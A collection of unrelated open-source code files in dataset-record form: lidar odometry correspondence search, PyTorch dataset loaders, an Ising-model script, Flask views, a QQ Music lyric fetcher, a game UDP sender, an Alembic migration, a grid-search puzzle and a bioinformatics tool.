基于‘点线距离’求解准备,针对t时刻的特征,需要找到t-1时刻的两个相邻特征\n 先找到距离i最近的一个特征点j,\n 然后找到与j不在同一扫描线上的l,l到i最近,且在j的前后2根扫描线上。\n 共同构成(j,l)\n '''\n def find_edge_correspondences(self, sharp_points):\n\n corners_cnt = len(sharp_points)\n\n edge_points = []\n edge_1 = []\n edge_2 = []\n # 
基于上一帧点云less_edge特征构建KDtree\n less_sharp_points_tree = o3d.geometry.KDTreeFlann(get_pcd_from_numpy(self.last_less_sharp_points))\n # 遍历当前强边特征(edge[t])\n for i in range(corners_cnt):\n point_sel = sharp_points[i] # 当前点(xyzr)\n _, idx, dist = less_sharp_points_tree.search_knn_vector_3d(point_sel[:3], 1) # 数量默认1,不进行获取,返回kd-tree中最近的knn=1个邻居点\n min_point_ind_2 = -1\n if dist[0] < self.DISTANCE_SQ_THRESHOLD: # 在距离1m范围内\n closest_point_ind = idx[0] # j点\n min_point_sq_dist_2 = self.DISTANCE_SQ_THRESHOLD\n closest_point_scan_id = self.last_less_sharp_points[closest_point_ind][3] # j点的ring number\n # 当前点到所有 边特征的“距离”\n dist_to_sel_point = matrix_dot_product((self.last_less_sharp_points[:, :3] - point_sel[:3]),\n (self.last_less_sharp_points[:, :3] - point_sel[:3]))\n # 从排除j之后,开始遍历上一帧点云 less sharp特征的剩余点寻找l\n # 上扫描线遍历[r + 1, r + 2]\n for j in range(closest_point_ind + 1, len(self.last_less_sharp_points)):\n # 只有扫描线不超过 对应点scan number的情况下进行,需要排除当前扫描线上的点\n if self.last_less_sharp_points[j][3] <= closest_point_scan_id:\n continue\n if self.last_less_sharp_points[j][3] > closest_point_scan_id + self.SCAN_VICINITY: #\n break\n # 满足扫描线约束的点距离\n point_sq_dist = dist_to_sel_point[j]\n if point_sq_dist < min_point_sq_dist_2: # 到他距离小于1的邻居点\n min_point_sq_dist_2 = point_sq_dist\n min_point_ind_2 = j\n # 下扫描线遍历 [r - 1, r - 2]\n for j in range(closest_point_ind - 1, -1, -1):\n if self.last_less_sharp_points[j][3] >= closest_point_scan_id: # >=ring\n continue\n if self.last_less_sharp_points[j][3] < closest_point_scan_id - self.SCAN_VICINITY: # = 0:\n edge_points.append(point_sel) # E(t)特征点\n edge_1.append(self.last_less_sharp_points[closest_point_ind]) # 对应j\n edge_2.append(self.last_less_sharp_points[min_point_ind_2]) # 对应l\n # 入队\n edge_points = np.vstack(edge_points)[:, :3]\n edge_1 = np.vstack(edge_1)[:, :3]\n edge_2 = np.vstack(edge_2)[:, :3]\n\n return edge_points, edge_1, edge_2\n '''\n 基于当前点F(t)中的i, ���到F(t-1)中的 不共线的三点j l m\n 基于 点到平面距离,构建correspondence\n 先找到距离i最近的一点j\n 然后找另外两个到i最近的点l,m\n 其中,l与j共扫描线,但l!=j\n 其中,m在j的上下扫描线上/scan+-2, zhangji17仅考虑上下1根相邻扫描线\n '''\n def find_surface_correspondences(self, flat_points, pcd): # pcd for visualization only\n surface_cnt = len(flat_points)\n print('Surface count: ', surface_cnt)\n\n surface_points = [] # i \\in flap[t]\n surface_1 = [] # j \\in less_flap[t-1]\n surface_2 = [] # m \\in less_flap[t-1]\n surface_3 = [] # l \\in less_flap[t-1]\n\n less_flat_points_tree = o3d.geometry.KDTreeFlann(get_pcd_from_numpy(self.last_less_flat_points)) # F(t-1)的KD-tree\n for i in range(surface_cnt):\n point_sel = flat_points[i] # 点I\n _, idx, dist = less_flat_points_tree.search_knn_vector_3d(point_sel[:3], 1) # 搜索到I最近的点\n min_point_ind_2 = -1\n min_point_ind_3 = -1\n # less_flat[t-1]中所有点到i的距离\n dist_to_sel_point = matrix_dot_product((self.last_less_flat_points[:, :3] - point_sel[:3]),\n (self.last_less_flat_points[:, :3] - point_sel[:3]))\n\n closest_point_ind = idx[0] # 点J\n v = self.last_less_flat_points[closest_point_ind][:3] - point_sel[:3]\n dist = np.dot(v, v) # J到I的‘距离’, 满足1m内约束条件\n if dist < self.DISTANCE_SQ_THRESHOLD:\n closest_point_scan_id = self.last_less_flat_points[closest_point_ind][3] # J的scan id\n min_point_sq_dist_2 = self.DISTANCE_SQ_THRESHOLD # 1m\n min_point_sq_dist_3 = self.DISTANCE_SQ_THRESHOLD # 1m\n\n for j in range(closest_point_ind + 1, len(self.last_less_flat_points)):\n if self.last_less_flat_points[j][3] > closest_point_scan_id + self.SCAN_VICINITY: # [scan_j+3,63]\n break\n\n point_sq_dist = dist_to_sel_point[j]\n # [0, scan_j]\n if 
self.last_less_flat_points[j][3] <= closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_2: # l与j共扫描线, 其余靠距离阈值过滤\n min_point_sq_dist_2 = point_sq_dist\n min_point_ind_2 = j\n # [scan_j+1, scan_j+2]\n elif self.last_less_flat_points[j][3] > closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_3: # m与j不共扫描线\n min_point_sq_dist_3 = point_sq_dist\n min_point_ind_3 = j\n\n for j in range(closest_point_ind - 1, -1, -1):\n if self.last_less_flat_points[j][3] < closest_point_scan_id - self.SCAN_VICINITY: # [0,scan_j-3]\n break\n\n point_sq_dist = dist_to_sel_point[j]\n # [scan_j,63]\n if self.last_less_flat_points[j][3] >= closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_2:\n min_point_sq_dist_2 = point_sq_dist\n min_point_ind_2 = j\n # [scan_j-2,scan_j-1]\n elif self.last_less_flat_points[j][3] < closest_point_scan_id \\\n and point_sq_dist < min_point_sq_dist_3:\n min_point_sq_dist_3 = point_sq_dist\n min_point_ind_3 = j\n\n if min_point_ind_2 >= 0 and min_point_ind_3 >= 0:\n surface_points.append(point_sel) # from current pcd[t]\n # from last frames\n surface_1.append(self.last_less_flat_points[closest_point_ind]) # 点J\n surface_2.append(self.last_less_flat_points[min_point_ind_2]) # 点L\n surface_3.append(self.last_less_flat_points[min_point_ind_3]) # 点 M\n\n surface_points = np.vstack(surface_points) # i\n surface_1 = np.vstack(surface_1) # j\n surface_2 = np.vstack(surface_2) # l\n surface_3 = np.vstack(surface_3) # m\n ind = surface_1[:, 3] > 0 # 逻辑上应该所有 scan id都大于0, 排除最近一圈在车上的?\n\n ''' i的对应特征点jlm,应该越多越好,而且应该是满足距离阈值(1m)越小越好\n # 可视化将前后两帧的特征点投影在同一坐标系下,满足相对T计算前提\n print('output: ', surface_points.shape[0])\n surf = np.vstack((surface_1[ind], surface_2[ind], surface_3[ind])) # t-1 中的参考点 j+l+m\n keypoints = utils.get_pcd_from_numpy(surf)\n keypoints.paint_uniform_color([0, 1, 0]) # green\n pcd = utils.get_pcd_from_numpy(pcd[0]) # t时刻面特征(存在对应参考点的)\n pcd.paint_uniform_color([0, 0, 1]) # blue\n orig = utils.get_pcd_from_numpy(surface_points[ind]) # 使用t-1的索引调t时刻pcd中的点\n orig.paint_uniform_color([1, 0, 0]) # red\n # o3d.visualization.draw_geometries([pcd, keypoints, orig]) # t, t-1, t| _:3:1\n o3d.visualization.draw_geometries([keypoints, orig])\n '''\n return surface_points[ind][:, :3], surface_1[ind][:, :3], surface_2[ind][:, :3], surface_3[ind][:, :3]\n","repo_name":"hahakid/Chinese-Note-for-Py-LOAM","sub_path":"LOAM/odometry_estimator.py","file_name":"odometry_estimator.py","file_ext":"py","file_size_in_byte":14524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33427347482","text":"import pandas as pd\nimport numpy as np\nfrom PIL import Image\nimport io\nimport math\nfrom sklearn.datasets import load_iris, load_wine, load_diabetes, load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nimport sklearn.utils\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision\nfrom torchvision import transforms\nfrom typing import cast, Any, Dict, List, Tuple, Optional, Union\n\nfrom .constants import logger\nfrom .transforms import *\n\nTS_DATASETS = ['iris', 'wine', 'diabetes', 'breast_cancer']\nCV_DATASETS = ['mnist', 'fashion_mnist', 'cifar', 'celeba']\n\n\ndef load_dataset(name: str, shuffle: bool=False, transform: Any=None, transform_params: Dict=None, ):\n if name in TS_DATASETS:\n return _load_ts_dataset(name, shuffle=shuffle, transform=transform)\n elif name in CV_DATASETS: \n return _load_cv_dataset(name, shuffle=shuffle, 
transform=transform, \n transform_params=transform_params)\n else:\n raise ValueError(f'Unknown dataset: {name}')\n\ndef _load_ts_dataset(name: str, shuffle: bool=False, split: bool=False, transform: Dict=None):\n if name == 'iris':\n dataset = load_iris()\n elif name == 'wine':\n dataset = load_wine()\n elif name == 'diabetes':\n dataset = load_diabetes()\n elif name == 'breast_cancer':\n dataset = load_breast_cancer()\n else:\n raise ValueError(f'Unknown dataset: {name}')\n \n df = pd.DataFrame(dataset.data, columns=dataset.feature_names)\n df['target'] = pd.Series(dataset.target)\n \n if transform:\n df = apply_transforms(df, transform)\n \n if shuffle:\n df = sklearn.utils.shuffle(df)\n \n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n return X, y\n\ndef _load_cv_dataset(name: str, shuffle: bool=False, transform: List=None, transform_params: Dict=None):\n if name == 'mnist':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.1307,), (0.3081,))])\n dataset_train = torchvision.datasets.MNIST('../../data', train=True, transform=transform, download=True)\n dataset_test = torchvision.datasets.MNIST('../../data', train=False, transform=transform, download=True) \n elif name == 'fashion_mnist':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform=transforms.Compose([transforms.ToTensor()])\n dataset_train = torchvision.datasets.FashionMNIST('../../data', train=True, transform=transform, download=True)\n dataset_test = torchvision.datasets.FashionMNIST('../../data', train=False, transform=transform, download=True) \n elif name == 'cifar':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset_train = torchvision.datasets.CIFAR10('../../data', train=True, transform=transform, download=True)\n dataset_test = torchvision.datasets.CIFAR10('../../data', train=False, transform=transform, download=True) \n elif name == 'celeba':\n if transform:\n transform = get_transforms_cv(transform, transform_params)\n else:\n transform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.CelebA('../../data', split='all', transform=transform, download=False)\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])\n else:\n raise ValueError(f'Unknown dataset: {name}')\n \n dataset = torch.utils.data.ConcatDataset([dataset_train, dataset_test])\n return dataset\n\ndef convert_dataset_to_numpy(dataset, shuffle=False):\n try:\n dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=shuffle)\n X, y = next(iter(dataloader))\n except RuntimeError as err:\n if str(err).startswith('stack expects each tensor to be equal size'):\n inp = input('Not all images have equal size. 
Choose size : ')\n size = tuple(map(int, inp.split('x')))\n new_transforms = [transforms.Resize(size)]\n update_transforms(dataset, new_transforms)\n dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=shuffle)\n X, y = next(iter(dataloader))\n else:\n raise RuntimeError(str(err))\n \n X = X.numpy() \n y = y.numpy()\n return X, y \n \n################## Util datasets ############################ \n \nclass NumpyDataset(Dataset):\n \n def __init__(self, data, targets, transform=None):\n self.data = data\n self.targets = torch.LongTensor(targets)\n self.transform = transform\n \n def __getitem__(self, idx):\n X = self.data[idx]\n y = self.targets[idx]\n \n if self.transform:\n X = Image.fromarray(self.data[idx].astype(np.uint8).transpose(1,2,0))\n X = self.transform(X)\n \n return X, y\n \n def __len__(self):\n return len(self.data)\n \nclass CSVFolderDataset(Dataset):\n \n def __init__(self, csv_file, root_dir, transform=None):\n \"\"\"\n Keyword arguments:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied on a sample.\n \"\"\"\n self.df = pd.read_csv(csv_file)\n self.root_dir = root_dir\n self.transform = transform\n \n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = os.path.join(self.root_dir, self.df.loc[idx, 'name'])\n X = io.imread(img_name)\n y = self.df.loc[idx, 'target']\n\n if self.transform:\n X = self.transform(X)\n\n return X, y\n \nclass CSVDataset(Dataset):\n \n # TODO Mode necessary?\n def __init__(self, csv_file, transform=None, mode='gray'):\n \"\"\"\n Keyword arguments:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied on a sample.\n \"\"\"\n self.df = pd.read_csv(csv_file)\n self.transform = transform\n \n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n # TODO add standard implementation for csv (rgb and gray)\n if 'width' in self.df and 'heigth' in self.df:\n width = self.df.loc[idx, 'width']\n heigth = self.df.loc[idx, 'heigth']\n elif 'size' in self.df:\n width = self.df.loc[idx, 'size']\n heigth = self.df.loc[idx, 'size']\n elif 'width' in self.df: \n width = self.df.loc[idx, 'width']\n heigth = (self.df.shape[1] - 1) // width\n elif 'heigth' in self.df:\n heigth = self.df.loc[idx, 'heigth']\n width = (self.df.shape[1] - 1) // heigth\n else:\n width = int(math.sqrt(self.df.shape[1] - 1))\n heigth = width\n \n array = np.zeros((width, heigth))\n for y in range(1, heigth):\n for x in range(1, width):\n array[x, y] = self.df.loc[idx, str(x) + 'x' + str(y)] \n X = Image.fromarray(array) \n if self.transform:\n X = self.transform(X)\n \n if 'target' in self.df:\n y = self.df.loc[idx, 'target']\n elif 'label' in self.df:\n y = self.df.loc[idx, 'label']\n elif 'class' in self.df:\n y = self.df.loc[idx, 'class']\n else:\n raise ValueError(f'Target column not found')\n return X, y \n\nclass Data_rb_cla(Dataset):\n \n def __init__(self, Xs, ys):\n # input is type of pandas\n self.Xs = torch.from_numpy(Xs.to_numpy()).float()\n self.ys = torch.from_numpy(ys.to_numpy()).long()\n\n def __len__(self):\n return len(self.Xs)\n\n def __getitem__(self, idx):\n return self.Xs[idx], self.ys[idx]\n\n\nclass Data_rb_reg(Dataset):\n \n def __init__(self, Xs, 
ys):\n # input is type of pandas\n self.Xs = torch.from_numpy(Xs.to_numpy()).float()\n self.ys = torch.from_numpy(ys.to_numpy()).float()\n\n def __len__(self):\n return len(self.Xs)\n\n def __getitem__(self, idx):\n return self.Xs[idx], self.ys[idx]\n \nclass MLP(torch.nn.Module):\n \n def __init__(self, input_size=6, hidden_size=32, output_size=1):\n super(MLP, self).__init__()\n self.layers = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n )\n self.ln = nn.Linear(hidden_size, output_size)\n\n def forward(self, inp):\n '''\n inp shape of torch tensor\n '''\n out = self.ln(self.layers(inp))\n return out","repo_name":"sdsc-bw/DataFactory","sub_path":"datafactory/util/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"11345441371","text":"import numpy as np\r\nfrom Functions_Ising_model import *\r\n\r\nN = 100\r\nbinsize = 0.02\r\nrng = np.random.default_rng(N)\r\n\r\nwith open(\"Data/Rat 3D Tracking & E-Phys KISN 2020 Dataset/concatenated_spike_times_26471_bank0_495neurons_6sessions.npz\", \"rb\") as file: \r\n data = np.load(file, allow_pickle=True)\r\n spike_times, interval = data[\"spike_times\"], data[\"interval\"]\r\n\r\nsubpop = rng.choice(len(spike_times), N, replace=False)\r\nsamples_data = time_binning(spike_times[subpop], interval, binsize)\r\n\r\nh, J = pseudolikelihood_sklearn(samples_data)\r\n\r\nnr_samples = samples_data.shape[0]\r\nsamples_pair = Metropolis_samples(nr_samples, h, J, 0.5, rng)\r\n\r\ncorrs3_data = corrs3(samples_data)\r\ncorrs3_pair = corrs3(samples_pair)\r\n\r\nfilename = f\"corrs3_{N}neurons.npz\" \r\ninfo = f\"Third-order correlations from a random subpopulation of {N} neurons (from Neuropixel data) \\\r\n and equally many samples from the pairwise model inferred with pseudolikelihood. \\\r\n Pseudolikelihood was used to approximate the parameters. 
Seed = {N}, binsize = {binsize}.\" \r\nnp.savez(filename, info=info, corrs3_data=corrs3_data, corrs3_pair=corrs3_pair, allow_pickle=True)\r\n","repo_name":"MarvelousTurtle/Master_thesis","sub_path":"Code/IDUN_corrs3.py","file_name":"IDUN_corrs3.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12420811996","text":"import base64\nimport time\nfrom typing import Optional\nfrom urllib.parse import quote_plus\n\nimport requests\n\nfrom music_service.base import BaseProvider\n\n\nclass QQMusicApi(BaseProvider):\n provider_name = 'qq'\n\n def fetch_lyric(self, name: str, artist: str = '', album: str = '', song_id: int = 0) -> Optional[str]:\n result = self.api_search_song(name, artist, album)\n item_list = result.get('data', {}).get('song', {}).get('itemlist', None)\n if not item_list:\n return None\n mid = item_list[0].get('mid', None)\n if not mid:\n return None\n lyric_result = self.api_lyric(mid)\n lyric = lyric_result.get('lyric', None)\n if not lyric:\n return None\n return base64.b64decode(lyric).decode('utf-8')\n\n def fetch_cover(self, name: str, artist: str = '', album: str = '', song_id: int = 0) -> Optional[str]:\n result = self.api_search_song(name, artist, album)\n item_list = result.get('data', {}).get('album', {}).get('itemlist', None)\n if not item_list:\n return None\n return item_list[0].get('pic', None)\n\n def api_search_song(self, name: str, artist: str = '', album: str = ''):\n key = quote_plus(f'{name} {artist}'.strip())\n url = 'https://c.y.qq.com/splcloud/fcgi-bin/smartbox_new.fcg?format=json' \\\n '&inCharset=utf-8&outCharset=utf-8&key=' + key\n return requests.get(url, headers={'Referer': 'https://c.y.qq.com/'}).json()\n\n def api_lyric(self, mid: str):\n current_millis = int((time.time()) * 1000)\n data = {\n 'pcachetime': str(current_millis),\n 'songmid': mid,\n 'g_tk': '5381',\n 'loginUin': '0',\n 'hostUin': '0',\n 'format': 'json',\n 'inCharset': 'utf8',\n 'outCharset': 'utf8',\n 'notice': '0',\n 'platform': 'yqq',\n 'needNewCode': '0',\n }\n\n url = 'https://c.y.qq.com/lyric/fcgi-bin/fcg_query_lyric_new.fcg'\n headers = {\n 'Referer': 'https://c.y.qq.com/'\n }\n return requests.post(url, data=data, headers=headers).json()\n","repo_name":"emacs-eaf/eaf-music-player","sub_path":"music_service/qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"27"} +{"seq_id":"6184455876","text":"import urllib\n\n\ndef get_movie_url(movie_name):#根据电影名称,生成搜索结果的URL\n host_url = 'http://s.dydytt.net/plus/search.php?kwtype=0&keyword='\n movie_sign = urllib.parse.quote(movie_name.encode('GBK'))\n search_url = host_url + movie_sign\n return search_url\n\nmovieName=\"Toy Story (1995)\"\nurl=get_movie_url(movieName)\nprint(url)","repo_name":"jianjunyue/deepplus","sub_path":"Word2Vec/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27613020090","text":"from flask import render_template,request,Blueprint\nfrom AMS.models import workorderPost\nfrom flask_login import current_user,login_required\ncore = Blueprint('core',__name__)\n\n@core.route('/')\ndef index():\n '''\n This is the home page view. 
Notice how it uses pagination to show a limited\n number of posts by limiting its query size and then calling paginate.\n '''\n workorder_posts = []\n if current_user.is_authenticated:\n page = request.args.get('page', 1, type=int)\n workorder_posts = workorderPost.query.filter_by(author=current_user).order_by(workorderPost.date.desc()).paginate(page=page, per_page=5)\n\n\n return render_template('index.html',workorder_posts=workorder_posts)\n\n@core.route('/info')\ndef info():\n '''\n Example view of any other \"core\" page, such as an info page, about page, or\n contact page. Any page that doesn't really sync with one of the models.\n '''\n return render_template('info.html')\n","repo_name":"PavanTiwari/AMSProject","sub_path":"AMS/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8736359447","text":"from components.motion import Motion\nfrom components.player_info import PlayerInfo\nfrom engine.system import System\nimport socket\n\n\nclass SendDirectionDataSystem(System):\n\n def __init__(self, engine, host, port, client_player_number):\n self._engine = engine\n self._client_player_number = client_player_number\n self._host = host\n self._port = port\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._elapsed_time = 0\n self._sending_interval = 40\n\n def start(self):\n pass\n\n def update(self, time):\n self._elapsed_time += time\n if self._elapsed_time >= self._sending_interval:\n self._elapsed_time -= self._sending_interval\n else:\n return\n\n players = self._engine.get_entity_by_group('player')\n\n for player in players:\n player_info = player.get(PlayerInfo)\n\n if player_info.number != self._client_player_number:\n continue\n\n player_motion = player.get(Motion)\n x = player_motion.x_velocity\n y = player_motion.y_velocity\n data = str(player_info.number) + '-'\n\n if x == 0 and y < 0:\n data += 'UP'\n elif x == 0 and y > 0:\n data += 'DOWN'\n elif x > 0 and y == 0:\n data += 'RIGHT'\n elif x < 0 and y == 0:\n data += 'LEFT'\n else:\n data += 'DIRECTION_ERROR'\n\n self._socket.sendto(data.encode(), (self._host, self._port))\n\n def end(self):\n pass\n\n","repo_name":"zyks/python-wars","sub_path":"systems/send_direction_data_system.py","file_name":"send_direction_data_system.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41787647006","text":"\"\"\"Added pluginName\n\nPeek Plugin Database Migration Script\n\nRevision ID: 7e6bd0411082\nRevises: deab93942032\nCreate Date: 2018-12-03 01:01:08.855992\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = \"7e6bd0411082\"\ndown_revision = \"deab93942032\"\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\ndef upgrade():\n op.execute('TRUNCATE TABLE pl_inbox.\"Task\" CASCADE ')\n op.execute('TRUNCATE TABLE pl_inbox.\"Activity\" CASCADE ')\n\n op.drop_constraint(\n \"Activity_uniqueId_key\", \"Activity\", schema=\"pl_inbox\", type_=\"unique\"\n )\n op.add_column(\n \"Activity\",\n sa.Column(\"pluginName\", sa.String(), nullable=False),\n schema=\"pl_inbox\",\n )\n op.create_index(\n \"idx_Activity_pluginName_uniqueId\",\n \"Activity\",\n [\"pluginName\", \"uniqueId\"],\n unique=True,\n schema=\"pl_inbox\",\n )\n\n 
op.drop_constraint(\"Task_uniqueId_key\", \"Task\", schema=\"pl_inbox\", type_=\"unique\")\n op.add_column(\n \"Task\", sa.Column(\"pluginName\", sa.String(), nullable=False), schema=\"pl_inbox\"\n )\n op.create_index(\n \"idx_Task_pluginName_uniqueId\",\n \"Task\",\n [\"pluginName\", \"uniqueId\"],\n unique=True,\n schema=\"pl_inbox\",\n )\n\n\ndef downgrade():\n op.drop_index(\"idx_Task_pluginName_uniqueId\", table_name=\"Task\", schema=\"pl_inbox\")\n op.drop_column(\"Task\", \"pluginName\", schema=\"pl_inbox\")\n op.create_unique_constraint(\n \"Task_uniqueId_key\", \"Task\", [\"uniqueId\"], schema=\"pl_inbox\"\n )\n\n op.drop_index(\n \"idx_Activity_pluginName_uniqueId\", table_name=\"Activity\", schema=\"pl_inbox\"\n )\n op.drop_column(\"Activity\", \"pluginName\", schema=\"pl_inbox\")\n op.create_unique_constraint(\n \"Activity_uniqueId_key\", \"Activity\", [\"uniqueId\"], schema=\"pl_inbox\"\n )\n","repo_name":"Synerty/peek-plugin-inbox","sub_path":"peek_plugin_inbox/_private/alembic/versions/7e6bd0411082_added_pluginname.py","file_name":"7e6bd0411082_added_pluginname.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28528730978","text":"n = int(input())\n\nmatrix = [list(input()) for _ in range(n)]\nvisited = [[0]*n for _ in range(n)]\ncnt = 0\ndef DFS(x,y,color):\n stack = [(x,y)]\n dx = [0,0,-1,1]\n dy = [1,-1,0,0]\n\n while stack :\n\n node = stack.pop()\n x, y = node[0], node[1]\n visited[x][y] = 1\n\n for j in range(4):\n\n xx = x + dx[j]\n yy = y + dy[j]\n\n if 0 <= xx < n and 0 <= yy < n :\n if matrix[xx][yy] == color and visited[xx][yy] == 0 :\n stack.append((xx,yy))\n\n return 1\n\n\nfor i in range(n):\n for j in range(n):\n if matrix[i][j] in ['R','G','B'] and visited[i][j] == 0 :\n cnt += DFS(i,j,matrix[i][j])\n\nprint(cnt, end=\" \")\n\nvisited = [[0]*n for _ in range(n)]\n\nfor i in range(n):\n for j in range(n):\n value = matrix[i][j]\n if value =='R':\n matrix[i][j] = 'G'\n\n\ncnt = 0\nfor i in range(n):\n for j in range(n):\n if matrix[i][j] in ['G','B'] and visited[i][j] == 0 :\n cnt += DFS(i,j,matrix[i][j])\n\nprint(cnt)","repo_name":"su-ram/Problem-Solving","sub_path":"백준/BFS_DFS/적록색약.py","file_name":"적록색약.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43518616093","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------\n\n'''This software has been developed by:\n\n GI Genética, Fisiología e Historia Forestal\n Dpto. 
Sistemas y Recursos Naturales\n ETSI Montes, Forestal y del Medio Natural\n Universidad Politécnica de Madrid\n https://github.com/ggfhf/\n\n Licence: GNU General Public Licence Version 3\n'''\n\n#-------------------------------------------------------------------------------\n\n'''This source contains the program of the ddRADseqTools software package that\n builds a file in FASTA/FASTQ format with simulated reads of a double digest\n RADseq.\n'''\n#-------------------------------------------------------------------------------\n\nimport os.path\nimport random\nimport re\nimport sys\n\nfrom genlib import *\n\n#-------------------------------------------------------------------------------\n\ndef main(argv):\n '''Main line of the program.'''\n\n # build the options dictionary\n options_dict = build_options()\n\n # it has been requested the help or to build a new config file\n for param in argv:\n # show the help and exit OK\n if param.startswith('--help'):\n print_help(options_dict)\n sys.exit(0)\n # build the config file and exit OK\n elif param.startswith('--config'):\n build_config(options_dict)\n sys.exit(0)\n\n # get the config file\n config_file = get_config_file(__file__)\n\n # get options from the config file and the input parameters\n options_dict = get_options(options_dict, config_file, argv)\n\n # build the file with simulated reads\n build_reads(options_dict)\n\n#-------------------------------------------------------------------------------\n\ndef build_reads(options_dict):\n '''Build a file in FASTA/FASTQ format with reads gotten from a file containing a double digest RAD-seq fragments.'''\n\n fragsfile = options_dict['fragsfile']['value']\n technique = options_dict['technique']['value']\n format = options_dict['format']['value']\n readsfile = options_dict['readsfile']['value']\n readtype = options_dict['readtype']['value']\n rsfile = options_dict['rsfile']['value']\n enzyme1 = options_dict['enzyme1']['value']\n enzyme2 = options_dict['enzyme2']['value']\n endsfile = options_dict['endsfile']['value']\n index1len = options_dict['index1len']['value']\n index2len = options_dict['index2len']['value']\n dbrlen = options_dict['dbrlen']['value']\n wend = options_dict['wend']['value']\n cend = options_dict['cend']['value']\n individualsfile = options_dict['individualsfile']['value']\n locinum = options_dict['locinum']['value']\n readsnum = options_dict['readsnum']['value']\n minreadvar = options_dict['minreadvar']['value']\n maxreadvar = options_dict['maxreadvar']['value']\n insertlen = options_dict['insertlen']['value']\n mutprob = options_dict['mutprob']['value']\n locusmaxmut = options_dict['locusmaxmut']['value']\n indelprob = options_dict['indelprob']['value']\n maxindelsize = options_dict['maxindelsize']['value']\n dropout = options_dict['dropout']['value']\n pcrdupprob = options_dict['pcrdupprob']['value']\n pcrdistribution = options_dict['pcrdistribution']['value']\n multiparam = options_dict['multiparam']['value']\n poissonparam = options_dict['poissonparam']['value']\n gcfactor = options_dict['gcfactor']['value']\n verbose = options_dict['verbose']['value']\n trace = options_dict['trace']['value']\n\n # set the verbose and trace status\n if verbose.upper() == 'YES':\n Message.set_verbose_status(True)\n else:\n Message.set_verbose_status(False)\n if trace.upper() == 'YES':\n Message.set_trace_status(True)\n else:\n Message.set_trace_status(False)\n\n # assign the symbol of the indexes and the DBR\n (index1_symbol, index2_symbol, dbr_symbol) = get_symbols()\n\n # get the 
restriction site sequences\n (ressite1_seq, ressite1_lcut_seq, ressite1_rcut_seq, ressite2_seq, ressite2_lcut_seq, ressite2_rcut_seq) = get_ressites(rsfile, enzyme1, enzyme2)\n Message.print('trace', 'ressite1_seq: {0} - ressite1_lcut_seq: {1} - ressite1_rcut_seq: {2}'.format(ressite1_seq, ressite1_lcut_seq, ressite1_rcut_seq))\n Message.print('trace', 'ressite2_seq: {0} - ressite2_lcut_seq: {1} - ressite2_rcut_seq: {2}'.format(ressite2_seq, ressite2_lcut_seq, ressite2_rcut_seq))\n\n # verify that the sequences of the restriction sites are different (double digest)\n if ressite1_seq.upper() == ressite2_seq.upper():\n raise ProgramError('L006', ressite1_seq.upper())\n\n # get the length of the restriction sites and the cut restriction sites\n ressite1_len = len(ressite1_seq)\n cut_ressite1_len = max(len(ressite1_lcut_seq), len(ressite1_rcut_seq))\n ressite2_len = len(ressite2_seq)\n cut_ressite2_len = max(len(ressite2_lcut_seq), len(ressite2_rcut_seq))\n Message.print('trace', 'ressite1_len: {0} - cut_ressite1_len: {1} - ressite2_len: {2} - cut_ressite2_len: {3}'.format(ressite1_len, cut_ressite1_len, ressite2_len, cut_ressite2_len))\n\n # get the list of 